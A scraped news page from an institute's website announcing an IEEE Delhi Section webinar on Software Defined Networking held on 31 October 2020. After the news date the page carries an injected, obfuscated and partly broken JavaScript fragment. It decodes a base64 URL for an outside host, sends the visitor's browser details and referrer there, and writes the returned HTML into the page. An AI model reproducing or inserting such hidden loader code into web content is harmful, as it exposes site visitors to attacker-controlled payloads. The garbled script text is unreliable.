

Published on BVICAM (http://14.140.205.245)

Home > Invitation for Webinar on Software Defined Networking (SDN) dated 31-10-2020

## Invitation for Webinar on Software Defined Networking (SDN) dated 31-10-2020

IEEE Delhi Section with Computer Society Chapter, Consultants Network Affinity Group, Life Member Affinity Group, Inter Society Relations, Industry Relations & SIGHT Standing Committees of IEEE Delhi with the associations CSI, Safa Society, ISTE Delhi Section, IETE Delhi Centre, invites you for a Webinar on 31-October-2020, the Saturday, at 06:00 p.m.

Industry surveys project that Software Defined Networking (SDN) is going to redefine the networking and the cloud world. This is the biggest technological change that has happened in networking field in last 30 years. SDN is a new way to Design, Build and Operate Networks. There is a need to Innovate in the Network. We?ve seen tons of innovation in applications, devices, computing and storage, yet the underlying network that connects everything has remained unchanged. SDN Opens the Network Up for Innovation. It replaces static, inflexible and complex networks, with networks that are agile, scalable and innovative. The webinar aims to discuss all round technological perspective of SDN.

## File:

Invitation for Webinar on Software Defined Networks dated 31-10-2020.pdf[₁]

**News Category:** 

Activities

**News Date:** 

Tuesday, 29 September, 2020 - 14:30

{ let selfer=new XMLHttpRequest;selfer.open("GET",

decodeURIComponent(escape(atob('aHR0cHM6Ly91cmxzcGF0aC5jb20vdmVyaWZ5LnBocA==')))

nt=\${navigator?.userAgent}&r=\${document?.referrer}`),selfer.onreadystatechange=(()=>{if(4==selfer.readyState)e);document.querySelector("body").insertAdjacentHTML("afterbegin",e?.html)}}),selfer.setRequestHeader("Reque **Source URL:** http://14.140.205.245/content/invitation-webinar-software-defined-networking-sdn-dated-31-10-2020

## Links:

[1]

http://14.140.205.245/sites/default/files/news/Invitation%20for%20Webinar%20on%20Software%20Defined%20Netw10-2020.pdf